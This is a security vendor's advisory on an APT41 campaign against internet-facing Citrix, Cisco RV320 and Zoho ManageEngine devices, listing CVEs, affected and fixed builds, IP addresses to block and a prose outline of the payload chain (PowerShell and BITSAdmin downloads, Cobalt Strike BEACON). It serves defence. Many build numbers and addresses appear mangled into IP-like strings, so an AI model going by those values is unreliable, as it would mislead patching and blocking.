Get in Touch
A malicious group, known as APT41, have an ongoing campaign seeking to exploit vulnerabilities in internet-facing Citrix, Cisco and Zoho ManageEngine devices. Quorum Cyber experts recommend identifying any potentially affected systems and implementing fixes identified by the vendors. Full guidance and resources provided in the following sections.
ATP41 Global Intrusion Campaign
Yesterday, FireEye produced an article outlining a new campaign by the Chinese actor known as APT41.
The campaign seeks to access devices which are connected via the internet – targeting a wide range of countries and industries, including:
|Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK, USA|
Banking/Finance, Construction, Defence Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, Utility
Quorum Cyber recommends identifying any potentially effected systems and implementing fixes identified by the vendors.
An external vulnerability scan may also be appropriate to verify these fixes have been properly implemented and to identify any other potential vulnerabilities with internet-facing systems. Further details on each vulnerability and resolution can be found below.
In addition, blocking communications with the IP addresses 220.127.116.11, 18.104.22.168 and 22.214.171.124 would be appropriate. In the following, we provide more detailed insight into each of the targeted vulnerabilities, and the recommended actions for you to secure your systems.
APT41 has been seen communicating via 126.96.36.199 and utilising CVE-2019-19781, a vulnerability in the Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP appliances. A wide range of Citrix systems have been affected which, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
The exploit affects the following supported Citrix products:
- Citrix ADC and Citrix Gateway version 13.0 all supported builds before 188.8.131.52
- NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 184.108.40.206
- NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 220.127.116.11
- NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 18.104.22.168
- NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
Citrix has released mitigation and fixes for the issue. Mitigation steps should be implemented and verified until such time as you are able to implement the fix which resolves the issue. Full details are available via Citrix support.
Details regarding the mitigation can be found at: https://support.citrix.com/article/CTX267679
A fix has also been issued in the form of a build refresh on supported appliances:
Citrix ADC and Citrix Gateway
|Version||Refresh Build||Release Date|
|10.5||10.5.70.12||24th January 2020 (Released)|
|11.1||22.214.171.124||19th January 2020 (Released)|
|12.0||126.96.36.199||19th January 2020 (Released)|
|12.1||188.8.131.52||23rd January 2020 (Released)|
|13.0||184.108.40.206||23rd January 2020 (Released)|
Citrix SD-WAN WANOP
|Release||Citrix ADC Release||Release Date|
|10.2.6b||220.127.116.115||22nd January 2020 (Released)|
|11.0.3b||18.104.22.1685||22nd January 2020 (Released)|
NB: If your build is already up to date, you need not implement the mitigation steps.
Continuing to use 22.214.171.124 for communication, APT41 has been seen exploiting Cisco Small Business RV320 routers to deliver a payload. The specific exploit utilised is currently unknown.
However, a Metasploit module combining two CVE’s appears to replicate similar activity to enable remote code execution and download the specified payload. These CVEs were CVE-2019-1653 and CVE-2019-1652.
The combination of these CVE’s affects the following Cisco products:
- Cisco Small Business RV320
- Cisco Small Business RV325
APT41 was observed communicating over 126.96.36.199 and utilising CVE-2020-10189 to perform remote code execution on Zoho ManageEngine Desktop Central devices. APT41 was found to be employing this vulnerability to launch two potential deployments of a payload. Firstly, to directly upload a Java based program containing commands to download and execute files obtained via PowerShell. The second variant used the Microsoft BITAdmin tool to download and install file obtained from known APT41 infrastructure (188.8.131.52).
Both variations were used to install a trial version of Cobalt Strike BEACON, a paid tool used in penetration testing allowing attackers (or red-teams) to deploy an agent on a victim’s machine.
The Cobalt Strike BEACON tool can grant a range of capabilities such as:
- Command execution;
- Privilege escalation;
- And more.
Using this tool, APT41 connected to a C2 address within the IP 184.108.40.206. It was noted that a secondary backdoor was often deployed, connecting to an alternative C2 address. This secondary exploit was found to be a VMProtected Meterpreter downloader to install BEACON shellcode. The use of a VMProtected binary is another known tactic by the actor.
This exploit affects Zoho ManageEngine Desktop Central prior to version 10.0.474.
Zoho has released a fix for this vulnerability with version 10.0.479. Full details are available via the ManageEngine Site.